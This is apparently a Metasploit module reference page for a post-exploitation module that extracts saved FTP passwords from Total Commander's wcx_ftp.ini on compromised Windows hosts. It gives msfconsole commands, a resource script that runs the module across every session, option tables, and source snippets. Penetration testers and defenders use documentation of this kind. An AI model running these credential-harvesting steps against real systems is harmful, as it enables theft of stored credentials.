Windows Gather Total Commander Saved Password Extraction - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/total_commander metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather Total Commander Saved Password Extraction
Module: post/windows/gather/credentials/total_commander
Source code: modules/post/windows/gather/credentials/total_commander.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module extracts weakly encrypted saved FTP Passwords from Total Commander. It finds saved FTP connections in the wcx_ftp.ini file.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/total_commander

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/total_commander
msf post(total_commander) > show options
    ... show and set options ...
msf post(total_commander) > set SESSION session-id
msf post(total_commander) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/total_commander")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/credentials/total_commander post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/total_commander

msf6 post(windows/gather/credentials/total_commander) > show info

       Name: Windows Gather Total Commander Saved Password Extraction
     Module: post/windows/gather/credentials/total_commander
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  theLightCosine <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module extracts weakly encrypted saved FTP Passwords from Total 
  Commander. It finds saved FTP connections in the wcx_ftp.ini file.

Module Options


This is a complete list of options available in the windows/gather/credentials/total_commander post exploitation module:

msf6 post(windows/gather/credentials/total_commander) > show options

Module options (post/windows/gather/credentials/total_commander):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/total_commander post exploitation module:

msf6 post(windows/gather/credentials/total_commander) > show advanced

Module advanced options (post/windows/gather/credentials/total_commander):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/total_commander module can do:

msf6 post(windows/gather/credentials/total_commander) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/total_commander post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/total_commander) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Total Commander Does not Appear to be Installed Globally


Here is a relevant code snippet related to the "Total Commander Does not Appear to be Installed Globally" error message:

40:	
41:	    commander_key = "HKLM\\Software\\Ghisler\\Total Commander"
42:	    hklmpath = registry_getvaldata(commander_key, 'FtpIniName')
43:	    case hklmpath
44:	    when nil
45:	      print_status('Total Commander Does not Appear to be Installed Globally')
46:	    when 'wcx_ftp.ini'
47:	      print_status("Already Checked SYSTEMROOT")
48:	    when '.\\wcx_ftp.ini'
49:	      hklminstpath = registry_getvaldata(commander_key, 'InstallDir') || ''
50:	      if hklminstpath.empty?

Unable to find InstallDir in registry, skipping wcx_ftp.ini


Here is a relevant code snippet related to the "Unable to find InstallDir in registry, skipping wcx_ftp.ini" error message:

46:	    when 'wcx_ftp.ini'
47:	      print_status("Already Checked SYSTEMROOT")
48:	    when '.\\wcx_ftp.ini'
49:	      hklminstpath = registry_getvaldata(commander_key, 'InstallDir') || ''
50:	      if hklminstpath.empty?
51:	        print_error('Unable to find InstallDir in registry, skipping wcx_ftp.ini')
52:	      else
53:	        check_other(hklminstpath + '\\wcx_ftp.ini')
54:	      end
55:	    when /APPDATA/
56:	      print_status('Already Checked AppData')

Total Commander Does not Appear to be Installed on This User


Here is a relevant code snippet related to the "Total Commander Does not Appear to be Installed on This User" error message:

68:	      profile_commander_key = "#{hive['HKU']}\\Software\\Ghisler\\Total Commander"
69:	      hkupath = registry_getvaldata(profile_commander_key, 'FtpIniName')
70:	      print_status("HKUP: #{hkupath}")
71:	      case hkupath
72:	      when nil
73:	        print_status('Total Commander Does not Appear to be Installed on This User')
74:	      when 'wcx_ftp.ini'
75:	        print_status("Already Checked SYSTEMROOT")
76:	      when '.\\wcx_ftp.ini'
77:	        hklminstpath = registry_getvaldata(profile_commander_key, 'InstallDir') || ''
78:	        if hklminstpath.empty?

Unable to find InstallDir in registry, skipping wcx_ftp.ini


Here is a relevant code snippet related to the "Unable to find InstallDir in registry, skipping wcx_ftp.ini" error message:

74:	      when 'wcx_ftp.ini'
75:	        print_status("Already Checked SYSTEMROOT")
76:	      when '.\\wcx_ftp.ini'
77:	        hklminstpath = registry_getvaldata(profile_commander_key, 'InstallDir') || ''
78:	        if hklminstpath.empty?
79:	          print_error('Unable to find InstallDir in registry, skipping wcx_ftp.ini')
80:	        else
81:	          check_other(hklminstpath + '\\wcx_ftp.ini')
82:	        end
83:	      when /APPDATA/
84:	        print_status('Already Checked AppData')

<FILENAME> not found ....


Here is a relevant code snippet related to the "<FILENAME> not found ...." error message:

110:	  def check_other(filename)
111:	    if file?(filename)
112:	      print_status("Found File at #{filename}")
113:	      get_ini(filename)
114:	    else
115:	      print_status("#{filename} not found ....")
116:	    end
117:	  end
118:	
119:	  def report_cred(opts)
120:	    service_data = {

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • theLightCosine

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.